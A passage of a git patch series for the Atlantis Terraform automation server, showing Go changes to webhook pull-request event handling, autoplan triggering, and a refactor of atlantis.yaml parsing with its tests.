 	PlanSuccess  *PlanSuccess
diff --git a/server/events/runtime/repoconfig.go b/server/events/runtime/repoconfig.go
index 138f73f0db..0880920fb5 100644
--- a/server/events/runtime/repoconfig.go
+++ b/server/events/runtime/repoconfig.go
@@ -5,6 +5,10 @@ import (
 	"github.com/runatlantis/atlantis/server/logging"
 )
 
+type TerraformExec interface {
+	RunCommandWithVersion(log *logging.SimpleLogger, path string, args []string, v *version.Version, workspace string) (string, error)
+}
+
 type ApplyRequirement interface {
 	// IsMet returns true if the requirement is met and false if not.
 	// If it returns false, it also returns a string describing why not.
@@ -12,7 +16,9 @@ type ApplyRequirement interface {
 }
 
 type PlanStage struct {
-	Steps []Step
+	Steps       []Step
+	Workspace   string
+	ProjectPath string
 }
 
 type ApplyStage struct {
diff --git a/server/events/yaml/project.go b/server/events/yaml/project.go
index dade99baef..7a5730665f 100644
--- a/server/events/yaml/project.go
+++ b/server/events/yaml/project.go
@@ -1,12 +1,12 @@
 package yaml
 
 type Project struct {
-	Dir               string    `yaml:"dir"`
-	Workspace         string    `yaml:"workspace"`
-	Workflow          string    `yaml:"workflow"`
-	TerraformVersion  string    `yaml:"terraform_version"`
-	AutoPlan          *AutoPlan `yaml:"auto_plan,omitempty"`
-	ApplyRequirements []string  `yaml:"apply_requirements"`
+	Dir               string   `yaml:"dir"`
+	Workspace         string   `yaml:"workspace"`
+	Workflow          string   `yaml:"workflow"`
+	TerraformVersion  string   `yaml:"terraform_version"`
+	AutoPlan          AutoPlan `yaml:"auto_plan,omitempty"`
+	ApplyRequirements []string `yaml:"apply_requirements"`
 }
 
 const DefaultWorkspace = "default"
@@ -17,7 +17,7 @@ func (p *Project) UnmarshalYAML(unmarshal func(interface{}) error) error {
 	// Set up defaults.
 	defaults := alias{
 		Workspace: DefaultWorkspace,
-		AutoPlan: &AutoPlan{
+		AutoPlan: AutoPlan{
 			Enabled:      true,
 			WhenModified: []string{"**/*.tf"},
 		},
diff --git a/server/events_controller.go b/server/events_controller.go
index b5a447be14..b5b3c73300 100644
--- a/server/events_controller.go
+++ b/server/events_controller.go
@@ -51,6 +51,10 @@ type EventsController struct {
 	// startup to support.
 	SupportedVCSHosts []models.VCSHostType
 	VCSClient         vcs.ClientProxy
+	// AtlantisGithubUser is the user that atlantis is running as for Github.
+	AtlantisGithubUser models.User
+	// AtlantisGitlabUser is the user that atlantis is running as for Gitlab.
+	AtlantisGitlabUser models.User
 }
 
 // Post handles POST webhook requests.
@@ -118,34 +122,76 @@ func (e *EventsController) HandleGithubCommentEvent(w http.ResponseWriter, event
 // request if the event is a pull request closed event. It's exported to make
 // testing easier.
 func (e *EventsController) HandleGithubPullRequestEvent(w http.ResponseWriter, pullEvent *github.PullRequestEvent, githubReqID string) {
-	pull, _, err := e.Parser.ParseGithubPull(pullEvent.PullRequest)
+	pull, headRepo, err := e.Parser.ParseGithubPull(pullEvent.PullRequest)
 	if err != nil {
 		e.respond(w, logging.Error, http.StatusBadRequest, "Error parsing pull data: %s %s", err, githubReqID)
 		return
 	}
-	repo, err := e.Parser.ParseGithubRepo(pullEvent.Repo)
+	baseRepo, err := e.Parser.ParseGithubRepo(pullEvent.Repo)
 	if err != nil {
 		e.respond(w, logging.Error, http.StatusBadRequest, "Error parsing repo data: %s %s", err, githubReqID)
 		return
 	}
-	e.handlePullRequestEvent(w, repo, pull)
+	var eventType string
+	switch pullEvent.GetAction() {
+	case "opened":
+		eventType = OpenPullEvent
+	case "synchronize":
+		eventType = UpdatedPullEvent
+	case "closed":
+		eventType = ClosedPullEvent
+	default:
+		eventType = OtherPullEvent
+	}
+	e.handlePullRequestEvent(w, baseRepo, headRepo, pull, e.AtlantisGithubUser, eventType)
 }
 
-func (e *EventsController) handlePullRequestEvent(w http.ResponseWriter, repo models.Repo, pull models.PullRequest) {
-	if !e.RepoWhitelist.IsWhitelisted(repo.FullName, repo.VCSHost.Hostname) {
+const OpenPullEvent = "opened"
+const UpdatedPullEvent = "updated"
+const ClosedPullEvent = "closed"
+const OtherPullEvent = "other"
+
+func (e *EventsController) handlePullRequestEvent(w http.ResponseWriter, baseRepo models.Repo, headRepo models.Repo, pull models.PullRequest, user models.User, eventType string) {
+	if !e.RepoWhitelist.IsWhitelisted(baseRepo.FullName, baseRepo.VCSHost.Hostname) {
+		// If the repo isn't whitelisted and we receive an opened pull request
+		// event we comment back on the pull request that the repo isn't
+		// whitelisted. This is because the user might be expecting Atlantis to
+		// autoplan. For other events, we just ignore them.
+		if eventType == OpenPullEvent {
+			e.commentNotWhitelisted(w, baseRepo, pull.Num)
+		}
 		e.respond(w, logging.Debug, http.StatusForbidden, "Ignoring pull request event from non-whitelisted repo")
 		return
 	}
-	if pull.State != models.Closed {
-		e.respond(w, logging.Debug, http.StatusOK, "Ignoring opened pull request event")
+
+	switch eventType {
+	case OpenPullEvent, UpdatedPullEvent:
+		// If the pull request was opened or updated, we will try to autoplan.
+
+		// Respond with success and then actually execute the command asynchronously.
+		// We use a goroutine so that this function returns and the connection is
+		// closed.
+		fmt.Fprintln(w, "Processing...")
+		// We use a Command to represent autoplanning but we set dir and
+		// workspace to '*' to indicate that all applicable dirs and workspaces
+		// should be planned.
+		autoplanCmd := events.NewCommand("*", nil, events.Plan, false, "*", true)
+		go e.CommandRunner.ExecuteCommand(baseRepo, headRepo, user, pull.Num, autoplanCmd)
 		return
-	}
-	if err := e.PullCleaner.CleanUpPull(repo, pull); err != nil {
-		e.respond(w, logging.Error, http.StatusInternalServerError, "Error cleaning pull request: %s", err)
+	case ClosedPullEvent:
+		// If the pull request was closed, we delete locks.
+		if err := e.PullCleaner.CleanUpPull(baseRepo, pull); err != nil {
+			e.respond(w, logging.Error, http.StatusInternalServerError, "Error cleaning pull request: %s", err)
+			return
+		}
+		e.Logger.Info("deleted locks and workspace for repo %s, pull %d", baseRepo.FullName, pull.Num)
+		fmt.Fprintln(w, "Pull request cleaned successfully")
+		return
+	case OtherPullEvent:
+		// Else we ignore the event.
+		e.respond(w, logging.Debug, http.StatusOK, "Ignoring opened pull request event")
 		return
 	}
-	e.Logger.Info("deleted locks and workspace for repo %s, pull %d", repo.FullName, pull.Num)
-	fmt.Fprintln(w, "Pull request cleaned successfully")
 }
 
 func (e *EventsController) handleGitlabPost(w http.ResponseWriter, r *http.Request) {
@@ -191,10 +237,7 @@ func (e *EventsController) handleCommentEvent(w http.ResponseWriter, baseRepo mo
 	// At this point we know it's a command we're not supposed to ignore, so now
 	// we check if this repo is allowed to run commands in the first place.
 	if !e.RepoWhitelist.IsWhitelisted(baseRepo.FullName, baseRepo.VCSHost.Hostname) {
-		errMsg := "```\nError: This repo is not whitelisted for Atlantis.\n```"
-		if err := e.VCSClient.CreateComment(baseRepo, pullNum, errMsg); err != nil {
-			e.Logger.Err("unable to comment on pull request: %s", err)
-		}
+		e.commentNotWhitelisted(w, baseRepo, pullNum)
 		e.respond(w, logging.Warn, http.StatusForbidden, "Repo not whitelisted")
 		return
 	}
@@ -222,12 +265,23 @@ func (e *EventsController) handleCommentEvent(w http.ResponseWriter, baseRepo mo
 // request if the event is a merge request closed event. It's exported to make
 // testing easier.
 func (e *EventsController) HandleGitlabMergeRequestEvent(w http.ResponseWriter, event gitlab.MergeEvent) {
-	pull, repo, err := e.Parser.ParseGitlabMergeEvent(event)
+	pull, baseRepo, headRepo, err := e.Parser.ParseGitlabMergeEvent(event)
 	if err != nil {
 		e.respond(w, logging.Error, http.StatusBadRequest, "Error parsing webhook: %s", err)
 		return
 	}
-	e.handlePullRequestEvent(w, repo, pull)
+	var eventType string
+	switch event.ObjectAttributes.Action {
+	case "open":
+		eventType = OpenPullEvent
+	case "update":
+		eventType = UpdatedPullEvent
+	case "merge", "close":
+		eventType = ClosedPullEvent
+	default:
+		eventType = OtherPullEvent
+	}
+	e.handlePullRequestEvent(w, baseRepo, headRepo, pull, e.AtlantisGitlabUser, eventType)
 }
 
 // supportsHost returns true if h is in e.SupportedVCSHosts and false otherwise.
@@ -246,3 +300,12 @@ func (e *EventsController) respond(w http.ResponseWriter, lvl logging.LogLevel,
 	w.WriteHeader(code)
 	fmt.Fprintln(w, response)
 }
+
+// commentNotWhitelisted comments on the pull request that the repo is not
+// whitelisted.
+func (e *EventsController) commentNotWhitelisted(w http.ResponseWriter, baseRepo models.Repo, pullNum int) {
+	errMsg := "```\nError: This repo is not whitelisted for Atlantis.\n```"
+	if err := e.VCSClient.CreateComment(baseRepo, pullNum, errMsg); err != nil {
+		e.Logger.Err("unable to comment on pull request: %s", err)
+	}
+}
diff --git a/server/server.go b/server/server.go
index 8ae0e5b6eb..368553a0ea 100644
--- a/server/server.go
+++ b/server/server.go
@@ -37,7 +37,6 @@ import (
 	"github.com/runatlantis/atlantis/server/events/locking/boltdb"
 	"github.com/runatlantis/atlantis/server/events/models"
 	"github.com/runatlantis/atlantis/server/events/run"
-	"github.com/runatlantis/atlantis/server/events/runtime"
 	"github.com/runatlantis/atlantis/server/events/terraform"
 	"github.com/runatlantis/atlantis/server/events/vcs"
 	"github.com/runatlantis/atlantis/server/events/webhooks"
@@ -201,10 +200,11 @@ func NewServer(userConfig UserConfig, config Config) (*Server, error) {
 		ConfigReader: configReader,
 		Terraform:    terraformClient,
 	}
-	executionPlanner := &runtime.ExecutionPlanner{
+	executionPlanner := &events.ExecutionPlanner{
 		ParserValidator:   &yaml.ParserValidator{},
 		DefaultTFVersion:  terraformClient.Version(),
 		TerraformExecutor: terraformClient,
+		ProjectFinder:     &events.DefaultProjectFinder{},
 	}
 	underlyingRouter := mux.NewRouter()
 	router := &Router{
@@ -289,6 +289,8 @@ func NewServer(userConfig UserConfig, config Config) (*Server, error) {
 		RepoWhitelist:          repoWhitelist,
 		SupportedVCSHosts:      supportedVCSHosts,
 		VCSClient:              vcsClient,
+		AtlantisGithubUser:     models.User{Username: userConfig.GithubUser},
+		AtlantisGitlabUser:     models.User{Username: userConfig.GitlabUser},
 	}
 	return &Server{
 		AtlantisVersion:    config.AtlantisVersion,

From f59fe33a4cc7df80b4677a10e5edb690422acb7a Mon Sep 17 00:00:00 2001
From: Luke Kysow <lkysow@gmail.com>
Date: Tue, 12 Jun 2018 18:43:22 +0100
Subject: [PATCH 19/69] Parse YAML without defaults/validation.

---
 server/events/execution_planner.go          |    6 +-
 server/events/yaml/auto_plan.go             |    8 +-
 server/events/yaml/auto_plan_test.go        |   36 +-
 server/events/yaml/config.go                |    7 -
 server/events/yaml/config_test.go           |   74 --
 server/events/yaml/parser_validator.go      |   43 +-
 server/events/yaml/parser_validator_test.go | 1002 +++++++++----------
 server/events/yaml/project.go               |   32 +-
 server/events/yaml/project_test.go          |   32 +-
 server/events/yaml/spec.go                  |    7 +
 server/events/yaml/spec_test.go             |  152 +++
 server/events/yaml/stage.go                 |    2 +-
 server/events/yaml/stage_test.go            |   47 +
 server/events/yaml/step.go                  |   61 ++
 server/events/yaml/step_config.go           |   82 --
 server/events/yaml/step_config_test.go      |  159 ---
 server/events/yaml/step_test.go             |  134 +++
 server/events/yaml/workflow.go              |   58 +-
 server/events/yaml/workflow_test.go         |   92 +-
 server/events/yaml/yaml_test.go             |   13 +
 testing/assertions.go                       |    8 +-
 21 files changed, 1022 insertions(+), 1033 deletions(-)
 delete mode 100644 server/events/yaml/config.go
 delete mode 100644 server/events/yaml/config_test.go
 create mode 100644 server/events/yaml/spec.go
 create mode 100644 server/events/yaml/spec_test.go
 create mode 100644 server/events/yaml/stage_test.go
 create mode 100644 server/events/yaml/step.go
 delete mode 100644 server/events/yaml/step_config.go
 delete mode 100644 server/events/yaml/step_config_test.go
 create mode 100644 server/events/yaml/step_test.go
 create mode 100644 server/events/yaml/yaml_test.go

diff --git a/server/events/execution_planner.go b/server/events/execution_planner.go
index e6e928c24b..415ed2da18 100644
--- a/server/events/execution_planner.go
+++ b/server/events/execution_planner.go
@@ -135,7 +135,7 @@ func (s *ExecutionPlanner) buildStage(stageName string, log *logging.SimpleLogge
 			// We have a workflow defined, so now we need to build it.
 			meta := s.buildMeta(log, repoDir, workspace, relProjectPath, extraCommentArgs, username)
 			var steps []runtime.Step
-			var stepsConfig []yaml.StepConfig
+			var stepsConfig []yaml.Step
 			if stageName == PlanStageName {
 				stepsConfig = workflow.Plan.Steps
 			} else {
@@ -143,7 +143,7 @@ func (s *ExecutionPlanner) buildStage(stageName string, log *logging.SimpleLogge
 			}
 			for _, stepConfig := range stepsConfig {
 				var step runtime.Step
-				switch stepConfig.StepType {
+				switch stepConfig.Key {
 				case "init":
 					step = &runtime.InitStep{
 						Meta:      meta,
@@ -162,7 +162,7 @@ func (s *ExecutionPlanner) buildStage(stageName string, log *logging.SimpleLogge
 				case "run":
 					step = &runtime.RunStep{
 						Meta:     meta,
-						Commands: stepConfig.Run,
+						Commands: stepConfig.StringVal,
 					}
 				}
 				steps = append(steps, step)
diff --git a/server/events/yaml/auto_plan.go b/server/events/yaml/auto_plan.go
index 16bcb80f5b..00eb0cc79d 100644
--- a/server/events/yaml/auto_plan.go
+++ b/server/events/yaml/auto_plan.go
@@ -1,10 +1,6 @@
 package yaml
 
 type AutoPlan struct {
-	WhenModified []string `yaml:"when_modified"`
-	Enabled      bool     `yaml:"enabled"`
+	WhenModified []string `yaml:"when_modified,omitempty"`
+	Enabled      *bool    `yaml:"enabled,omitempty"`
 }
-
-// NOTE: AutoPlan does not implement UnmarshalYAML because we are unable to set
-// defaults for bool and []string fields and so we just use the normal yaml
-// unmarshalling.
diff --git a/server/events/yaml/auto_plan_test.go b/server/events/yaml/auto_plan_test.go
index 2dd8a43ef9..04d517d94f 100644
--- a/server/events/yaml/auto_plan_test.go
+++ b/server/events/yaml/auto_plan_test.go
@@ -15,31 +15,53 @@ func TestAutoPlan_UnmarshalYAML(t *testing.T) {
 		exp         yaml.AutoPlan
 	}{
 		{
-			description: "should use defaults",
-			input: `
-`,
+			description: "omit unset fields",
+			input:       "",
 			exp: yaml.AutoPlan{
-				Enabled:      false,
+				Enabled:      nil,
 				WhenModified: nil,
 			},
 		},
 		{
-			description: "should use all set fields",
+			description: "all fields set",
 			input: `
 enabled: true
 when_modified: ["something-else"]
 `,
 			exp: yaml.AutoPlan{
-				Enabled:      true,
+				Enabled:      Bool(true),
+				WhenModified: []string{"something-else"},
+			},
+		},
+		{
+			description: "enabled false",
+			input: `
+enabled: false
+when_modified: ["something-else"]
+`,
+			exp: yaml.AutoPlan{
+				Enabled:      Bool(false),
 				WhenModified: []string{"something-else"},
 			},
 		},
+		{
+			description: "modified elem empty",
+			input: `
+enabled: false
+when_modified:
+-
+`,
+			exp: yaml.AutoPlan{
+				Enabled:      Bool(false),
+				WhenModified: []string{""},
+			},
+		},
 	}
 
 	for _, c := range cases {
 		t.Run(c.description, func(t *testing.T) {
 			var a yaml.AutoPlan
-			err := yamlv2.Unmarshal([]byte(c.input), &a)
+			err := yamlv2.UnmarshalStrict([]byte(c.input), &a)
 			Ok(t, err)
 			Equals(t, c.exp, a)
 		})
diff --git a/server/events/yaml/config.go b/server/events/yaml/config.go
deleted file mode 100644
index cd8c4f26eb..0000000000
--- a/server/events/yaml/config.go
+++ /dev/null
@@ -1,7 +0,0 @@
-package yaml
-
-type Config struct {
-	Version   int                 `yaml:"version"`
-	Projects  []Project           `yaml:"projects"`
-	Workflows map[string]Workflow `yaml:"workflows"`
-}
diff --git a/server/events/yaml/config_test.go b/server/events/yaml/config_test.go
deleted file mode 100644
index df4bc9c541..0000000000
--- a/server/events/yaml/config_test.go
+++ /dev/null
@@ -1,74 +0,0 @@
-package yaml_test
-
-import (
-	"testing"
-
-	"github.com/runatlantis/atlantis/server/events/yaml"
-	. "github.com/runatlantis/atlantis/testing"
-	yamlv2 "gopkg.in/yaml.v2"
-)
-
-func TestConfig_UnmarshalYAML(t *testing.T) {
-	cases := []struct {
-		description string
-		input       string
-		exp         yaml.Config
-	}{
-		{
-			description: "should be empty if nothing set",
-			input:       `~`,
-			exp: yaml.Config{
-				Version:   0,
-				Projects:  nil,
-				Workflows: nil,
-			},
-		},
-		{
-			description: "should use values if set",
-			input: `
-version: 2
-projects:
-- dir: mydir
-  workspace: myworkspace
-  workflow: default
-workflows:
-  default:
-    plan:
-      steps: []
-    apply:
-     steps: []`,
-			exp: yaml.Config{
-				Version: 2,
-				Projects: []yaml.Project{
-					{
-						Dir:       "mydir",
-						Workflow:  "default",
-						Workspace: "myworkspace",
-						AutoPlan: &yaml.AutoPlan{
-							WhenModified: []string{"**/*.tf"},
-							Enabled:      true,
-						},
-					},
-				},
-				Workflows: map[string]yaml.Workflow{
-					"default": {
-						Apply: &yaml.Stage{
-							Steps: []yaml.StepConfig{},
-						},
-						Plan: &yaml.Stage{
-							Steps: []yaml.StepConfig{},
-						},
-					},
-				},
-			},
-		},
-	}
-	for _, c := range cases {
-		t.Run(c.description, func(t *testing.T) {
-			var conf yaml.Config
-			err := yamlv2.Unmarshal([]byte(c.input), &conf)
-			Ok(t, err)
-			Equals(t, c.exp, conf)
-		})
-	}
-}
diff --git a/server/events/yaml/parser_validator.go b/server/events/yaml/parser_validator.go
index 8612015043..f824737404 100644
--- a/server/events/yaml/parser_validator.go
+++ b/server/events/yaml/parser_validator.go
@@ -1,7 +1,6 @@
 package yaml
 
 import (
-	"fmt"
 	"io/ioutil"
 	"os"
 	"path/filepath"
@@ -18,50 +17,50 @@ type ParserValidator struct{}
 // ReadConfig returns the parsed and validated atlantis.yaml config for repoDir.
 // If there was no config file, then this can be detected by checking the type
 // of error: os.IsNotExist(error).
-func (r *ParserValidator) ReadConfig(repoDir string) (Config, error) {
+func (r *ParserValidator) ReadConfig(repoDir string) (Spec, error) {
 	configFile := filepath.Join(repoDir, AtlantisYAMLFilename)
 	configData, err := ioutil.ReadFile(configFile)
 
 	// NOTE: the error we return here must also be os.IsNotExist since that's
 	// what our callers use to detect a missing config file.
 	if err != nil && os.IsNotExist(err) {
-		return Config{}, err
+		return Spec{}, err
 	}
 
 	// If it exists but we couldn't read it return an error.
 	if err != nil {
-		return Config{}, errors.Wrapf(err, "unable to read %s file", AtlantisYAMLFilename)
+		return Spec{}, errors.Wrapf(err, "unable to read %s file", AtlantisYAMLFilename)
 	}
 
 	// If the config file exists, parse it.
 	config, err := r.parseAndValidate(configData)
 	if err != nil {
-		return Config{}, errors.Wrapf(err, "parsing %s", AtlantisYAMLFilename)
+		return Spec{}, errors.Wrapf(err, "parsing %s", AtlantisYAMLFilename)
 	}
 	return config, err
 }
 
-func (r *ParserValidator) parseAndValidate(configData []byte) (Config, error) {
-	var repoConfig Config
+func (r *ParserValidator) parseAndValidate(configData []byte) (Spec, error) {
+	var repoConfig Spec
 	if err := yaml.UnmarshalStrict(configData, &repoConfig); err != nil {
 		return repoConfig, err
 	}
 
 	// Validate version.
-	if repoConfig.Version != 2 {
-		// todo: this will fail old atlantis.yaml files, we should deal with them in a better way.
-		return repoConfig, errors.New("unknown version: must have \"version: 2\" set")
-	}
-
-	// Validate projects.
-	if len(repoConfig.Projects) == 0 {
-		return repoConfig, errors.New("'projects' key must exist and contain at least one element")
-	}
-
-	for i, project := range repoConfig.Projects {
-		if project.Dir == "" {
-			return repoConfig, fmt.Errorf("project at index %d invalid: dir key must be set and non-empty", i)
-		}
-	}
+	//if repoConfig.Version != 2 {
+	//	// todo: this will fail old atlantis.yaml files, we should deal with them in a better way.
+	//	return repoConfig, errors.New("unknown version: must have \"version: 2\" set")
+	//}
+	//
+	//// Validate projects.
+	//if len(repoConfig.Projects) == 0 {
+	//	return repoConfig, errors.New("'projects' key must exist and contain at least one element")
+	//}
+	//
+	//for i, project := range repoConfig.Projects {
+	//	if project.Dir == "" {
+	//		return repoConfig, fmt.Errorf("project at index %d invalid: dir key must be set and non-empty", i)
+	//	}
+	//}
 	return repoConfig, nil
 }
diff --git a/server/events/yaml/parser_validator_test.go b/server/events/yaml/parser_validator_test.go
index 4adc8ca34d..3081970892 100644
--- a/server/events/yaml/parser_validator_test.go
+++ b/server/events/yaml/parser_validator_test.go
@@ -1,508 +1,498 @@
 package yaml_test
 
-import (
-	"io/ioutil"
-	"os"
-	"path/filepath"
-	"testing"
-
-	"github.com/runatlantis/atlantis/server/events/yaml"
-	. "github.com/runatlantis/atlantis/testing"
-)
-
-func TestReadConfig_DirDoesNotExist(t *testing.T) {
-	r := yaml.ParserValidator{}
-	_, err := r.ReadConfig("/not/exist")
-	Assert(t, os.IsNotExist(err), "exp nil ptr")
-}
-
-func TestReadConfig_FileDoesNotExist(t *testing.T) {
-	tmpDir, cleanup := TempDir(t)
-	defer cleanup()
-
-	r := yaml.ParserValidator{}
-	_, err := r.ReadConfig(tmpDir)
-	Assert(t, os.IsNotExist(err), "exp nil ptr")
-}
-
-func TestReadConfig_BadPermissions(t *testing.T) {
-	tmpDir, cleanup := TempDir(t)
-	defer cleanup()
-	err := ioutil.WriteFile(filepath.Join(tmpDir, "atlantis.yaml"), nil, 0000)
-	Ok(t, err)
-
-	r := yaml.ParserValidator{}
-	_, err = r.ReadConfig(tmpDir)
-	ErrContains(t, "unable to read atlantis.yaml file: ", err)
-}
-
-func TestReadConfig_UnmarshalErrors(t *testing.T) {
-	// We only have a few cases here because we assume the YAML library to be
-	// well tested. See https://github.com/go-yaml/yaml/blob/v2/decode_test.go#L810.
-	cases := []struct {
-		description string
-		input       string
-		expErr      string
-	}{
-		{
-			"random characters",
-			"slkjds",
-			"parsing atlantis.yaml: yaml: unmarshal errors:\n  line 1: cannot unmarshal !!str `slkjds` into yaml.Config",
-		},
-		{
-			"just a colon",
-			":",
-			"parsing atlantis.yaml: yaml: did not find expected key",
-		},
-	}
-
-	tmpDir, cleanup := TempDir(t)
-	defer cleanup()
-
-	for _, c := range cases {
-		t.Run(c.description, func(t *testing.T) {
-			err := ioutil.WriteFile(filepath.Join(tmpDir, "atlantis.yaml"), []byte(c.input), 0600)
-			Ok(t, err)
-			r := yaml.ParserValidator{}
-			_, err = r.ReadConfig(tmpDir)
-			ErrEquals(t, c.expErr, err)
-		})
-	}
-}
-
-func TestReadConfig_Invalid(t *testing.T) {
-	cases := []struct {
-		description string
-		input       string
-		expErr      string
-	}{
-		// Invalid version.
-		{
-			description: "no version",
-			input: `
-projects:
-- dir: "."
-`,
-			expErr: "unknown version: must have \"version: 2\" set",
-		},
-		{
-			description: "unsupported version",
-			input: `
-version: 0
-projects:
-- dir: "."
-`,
-			expErr: "unknown version: must have \"version: 2\" set",
-		},
-		{
-			description: "empty version",
-			input: `
-version: ~
-projects:
-- dir: "."
-`,
-			expErr: "unknown version: must have \"version: 2\" set",
-		},
-
-		// No projects specified.
-		{
-			description: "no projects key",
-			input:       `version: 2`,
-			expErr:      "'projects' key must exist and contain at least one element",
-		},
-		{
-			description: "empty projects list",
-			input: `
-version: 2
-projects:`,
-			expErr: "'projects' key must exist and contain at least one element",
-		},
-
-		// Project must have dir set.
-		{
-			description: "project with no config",
-			input: `
-version: 2
-projects:
--`,
-			expErr: "project at index 0 invalid: dir key must be set and non-empty",
-		},
-		{
-			description: "project without dir set",
-			input: `
-version: 2
-projects:
-- workspace: "staging"`,
-			expErr: "project at index 0 invalid: dir key must be set and non-empty",
-		},
-		{
-			description: "project with dir set to empty string",
-			input: `
-version: 2
-projects:
-- dir: ""`,
-			expErr: "project at index 0 invalid: dir key must be set and non-empty",
-		},
-		{
-			description: "project with no config at index 1",
-			input: `
-version: 2
-projects:
-- dir: "."
--`,
-			expErr: "project at index 1 invalid: dir key must be set and non-empty",
-		},
-		{
-			description: "project with unknown key",
-			input: `
-version: 2
-projects:
-- unknown: value`,
-			expErr: "yaml: unmarshal errors:\n  line 4: field unknown not found in struct yaml.alias",
-		},
-	}
-
-	tmpDir, cleanup := TempDir(t)
-	defer cleanup()
-
-	for _, c := range cases {
-		t.Run(c.description, func(t *testing.T) {
-			err := ioutil.WriteFile(filepath.Join(tmpDir, "atlantis.yaml"), []byte(c.input), 0600)
-			Ok(t, err)
-
-			r := yaml.ParserValidator{}
-			_, err = r.ReadConfig(tmpDir)
-			ErrEquals(t, "parsing atlantis.yaml: "+c.expErr, err)
-		})
-	}
-}
-
-func TestReadConfig_Successes(t *testing.T) {
-	basicProjects := []yaml.Project{
-		{
-			AutoPlan: &yaml.AutoPlan{
-				Enabled:      true,
-				WhenModified: []string{"**/*.tf"},
-			},
-			Workspace:         "default",
-			TerraformVersion:  "",
-			ApplyRequirements: nil,
-			Workflow:          "",
-			Dir:               ".",
-		},
-	}
-
-	cases := []struct {
-		description string
-		input       string
-		expOutput   yaml.Config
-	}{
-		{
-			description: "uses project defaults",
-			input: `
-version: 2
-projects:
-- dir: "."`,
-			expOutput: yaml.Config{
-				Version:  2,
-				Projects: basicProjects,
-			},
-		},
-		{
-			description: "autoplan is enabled by default",
-			input: `
-version: 2
-projects:
-- dir: "."
-  auto_plan:
-    when_modified: ["**/*.tf"]
-`,
-			expOutput: yaml.Config{
-				Version:  2,
-				Projects: basicProjects,
-			},
-		},
-		{
-			description: "if workflows not defined, there are none",
-			input: `
-version: 2
-projects:
-- dir: "."
-`,
-			expOutput: yaml.Config{
-				Version:  2,
-				Projects: basicProjects,
-			},
-		},
-		{
-			description: "if workflows key set but with no workflows there are none",
-			input: `
-version: 2
-projects:
-- dir: "."
-workflows: ~
-`,
-			expOutput: yaml.Config{
-				Version:  2,
-				Projects: basicProjects,
-			},
-		},
-		{
-			description: "if a workflow is defined but set to null we use the defaults",
-			input: `
-version: 2
-projects:
-- dir: "."
-workflows:
-  default: ~
-`,
-			expOutput: yaml.Config{
-				Version:  2,
-				Projects: basicProjects,
-				Workflows: map[string]yaml.Workflow{
-					"default": {
-						Plan: &yaml.Stage{
-							Steps: []yaml.StepConfig{
-								{
-									StepType: "init",
-								},
-								{
-									StepType: "plan",
-								},
-							},
-						},
-						Apply: &yaml.Stage{
-							Steps: []yaml.StepConfig{
-								{
-									StepType: "apply",
-								},
-							},
-						},
-					},
-				},
-			},
-		},
-		{
-			description: "if a plan or apply has no steps defined then we use the defaults",
-			input: `
-version: 2
-projects:
-- dir: "."
-workflows:
-  default:
-    plan:
-    apply:
-`,
-			expOutput: yaml.Config{
-				Version:  2,
-				Projects: basicProjects,
-				Workflows: map[string]yaml.Workflow{
-					"default": {
-						Plan: &yaml.Stage{
-							Steps: []yaml.StepConfig{
-								{
-									StepType: "init",
-								},
-								{
-									StepType: "plan",
-								},
-							},
-						},
-						Apply: &yaml.Stage{
-							Steps: []yaml.StepConfig{
-								{
-									StepType: "apply",
-								},
-							},
-						},
-					},
-				},
-			},
-		},
-		{
-			description: "if a plan or apply explicitly defines an empty steps key then there are no steps",
-			input: `
-version: 2
-projects:
-- dir: "."
-workflows:
-  default:
-    plan:
-      steps:
-    apply:
-      steps:
-`,
-			expOutput: yaml.Config{
-				Version:  2,
-				Projects: basicProjects,
-				Workflows: map[string]yaml.Workflow{
-					"default": {
-						Plan: &yaml.Stage{
-							Steps: nil,
-						},
-						Apply: &yaml.Stage{
-							Steps: nil,
-						},
-					},
-				},
-			},
-		},
-		{
-			description: "if steps are set then we parse them properly",
-			input: `
-version: 2
-projects:
-- dir: "."
-workflows:
-  default:
-    plan:
-      steps:
-      - init
-      - plan
-    apply:
-      steps:
-      - plan # we don't validate if they make sense
-      - apply
-`,
-			expOutput: yaml.Config{
-				Version:  2,
-				Projects: basicProjects,
-				Workflows: map[string]yaml.Workflow{
-					"default": {
-						Plan: &yaml.Stage{
-							Steps: []yaml.StepConfig{
-								{
-									StepType: "init",
-								},
-								{
-									StepType: "plan",
-								},
-							},
-						},
-						Apply: &yaml.Stage{
-							Steps: []yaml.StepConfig{
-								{
-									StepType: "plan",
-								},
-								{
-									StepType: "apply",
-								},
-							},
-						},
-					},
-				},
-			},
-		},
-		{
-			description: "we parse extra_args for the steps",
-			input: `
-version: 2
-projects:
-- dir: "."
-workflows:
-  default:
-    plan:
-      steps:
-      - init:
-          extra_args: []
-      - plan:
-          extra_args:
-          - arg1
-          - arg2
-    apply:
-      steps:
-      - plan:
-          extra_args: [a, b]
-      - apply:
-          extra_args: ["a", "b"]
-`,
-			expOutput: yaml.Config{
-				Version:  2,
-				Projects: basicProjects,
-				Workflows: map[string]yaml.Workflow{
-					"default": {
-						Plan: &yaml.Stage{
-							Steps: []yaml.StepConfig{
-								{
-									StepType:  "init",
-									ExtraArgs: []string{},
-								},
-								{
-									StepType:  "plan",
-									ExtraArgs: []string{"arg1", "arg2"},
-								},
-							},
-						},
-						Apply: &yaml.Stage{
-							Steps: []yaml.StepConfig{
-								{
-									StepType:  "plan",
-									ExtraArgs: []string{"a", "b"},
-								},
-								{
-									StepType:  "apply",
-									ExtraArgs: []string{"a", "b"},
-								},
-							},
-						},
-					},
-				},
-			},
-		},
-		{
-			description: "custom steps are parsed",
-			input: `
-version: 2
-projects:
-- dir: "."
-workflows:
-  default:
-    plan:
-      steps:
-      - run: "echo \"plan hi\""
-    apply:
-      steps:
-      - run: echo apply "arg 2"
-`,
-			expOutput: yaml.Config{
-				Version:  2,
-				Projects: basicProjects,
-				Workflows: map[string]yaml.Workflow{
-					"default": {
-						Plan: &yaml.Stage{
-							Steps: []yaml.StepConfig{
-								{
-									StepType: "run",
-									Run:      []string{"echo", "plan hi"},
-								},
-							},
-						},
-						Apply: &yaml.Stage{
-							Steps: []yaml.StepConfig{
-								{
-									StepType: "run",
-									Run:      []string{"echo", "apply", "arg 2"},
-								},
-							},
-						},
-					},
-				},
-			},
-		},
-	}
-
-	tmpDir, cleanup := TempDir(t)
-	defer cleanup()
-
-	for _, c := range cases {
-		t.Run(c.description, func(t *testing.T) {
-			err := ioutil.WriteFile(filepath.Join(tmpDir, "atlantis.yaml"), []byte(c.input), 0600)
-			Ok(t, err)
-
-			r := yaml.ParserValidator{}
